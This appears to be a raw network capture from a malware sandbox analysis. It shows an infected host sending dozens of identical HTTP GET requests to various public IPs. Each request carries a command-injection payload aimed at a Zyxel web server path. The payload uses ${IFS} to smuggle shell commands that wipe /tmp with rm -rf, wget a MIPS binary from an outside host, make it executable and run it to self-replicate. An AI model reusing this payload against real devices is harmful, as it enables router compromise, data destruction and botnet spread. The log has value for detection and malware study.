                                        Mar 31, 2024 09:20:55.555890083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2922192.168.2.234996657.91.58.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:56.558257103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2923192.168.2.235376092.153.51.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:56.558310986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2924192.168.2.23582381.42.255.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:56.558345079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2925192.168.2.234663612.189.74.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:56.558401108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2926192.168.2.234126280.169.100.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:56.558609009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2927192.168.2.2334318216.71.147.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:56.558676004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2928192.168.2.2336936117.25.161.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:56.558726072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2929192.168.2.2341328100.240.164.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:57.568928003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2930192.168.2.2340218187.122.37.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:57.568981886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2931192.168.2.2346792212.100.122.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:57.569037914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2932192.168.2.2359416168.133.4.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:57.569219112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2933192.168.2.2349038151.180.181.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:57.569253922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2934192.168.2.2344652120.164.88.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:57.569304943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2935192.168.2.2359678205.244.254.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.587918043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2936192.168.2.2349104131.242.129.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.587966919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2937192.168.2.2339442216.84.43.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588000059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2938192.168.2.2340024194.178.164.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588052988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2939192.168.2.235959213.206.128.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588087082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2940192.168.2.2345322152.28.59.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588135958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2941192.168.2.2341166205.164.7.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588171959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2942192.168.2.2350820130.1.215.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588212013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2943192.168.2.2336788108.137.215.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588257074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2944192.168.2.2334066110.209.169.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588305950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2945192.168.2.233826014.117.83.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588344097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2946192.168.2.234552079.121.168.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588391066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2947192.168.2.234918478.52.239.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588432074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2948192.168.2.235300248.159.180.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588473082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2949192.168.2.2339436190.29.32.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588511944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2950192.168.2.2354716186.16.250.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588565111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2951192.168.2.2352660113.56.199.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588618040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2952192.168.2.2346162220.20.28.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588670969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2953192.168.2.23594509.50.72.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588707924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2954192.168.2.235030832.213.51.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588747978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2955192.168.2.235462844.74.177.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588800907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2956192.168.2.2348704103.37.85.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588852882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2957192.168.2.2334646139.223.0.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588901043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2958192.168.2.2348238170.228.217.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588939905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2959192.168.2.2345998133.57.211.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.588987112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2960192.168.2.2350280104.63.113.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589041948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2961192.168.2.2334908163.155.188.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589081049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2962192.168.2.234583837.145.141.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589131117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2963192.168.2.234299257.204.96.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589179039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2964192.168.2.233982257.119.94.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589230061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2965192.168.2.2355434148.205.96.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589262009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2966192.168.2.233997088.63.64.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589320898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2967192.168.2.234770091.88.243.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589369059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2968192.168.2.235445278.161.172.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589421988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2969192.168.2.2336996163.81.168.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589473963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2970192.168.2.235710670.50.84.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589526892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2971192.168.2.2351208124.166.134.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589570045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2972192.168.2.234163427.86.40.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589622021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2973192.168.2.2356092170.37.63.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589689016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2974192.168.2.2342060159.110.64.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589730978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2975192.168.2.2349410182.67.123.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589780092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2976192.168.2.2333542124.101.151.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589833975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2977192.168.2.234736420.3.225.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589876890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2978192.168.2.2347490188.30.1.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589930058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2979192.168.2.2348066117.36.23.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.589972973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2980192.168.2.234817660.25.237.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590013981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2981192.168.2.2359062155.223.83.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590059996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2982192.168.2.233656297.98.70.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590104103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2983192.168.2.2346972190.158.97.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590140104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2984192.168.2.2357608130.127.49.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590213060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2985192.168.2.233450424.212.81.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590259075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2986192.168.2.2333306197.192.71.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590296984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2987192.168.2.234095242.201.254.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590347052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2988192.168.2.2348190117.202.78.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.590387106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2989192.168.2.2358926178.168.26.54443
                                        TimestampBytes transferredDirectionData
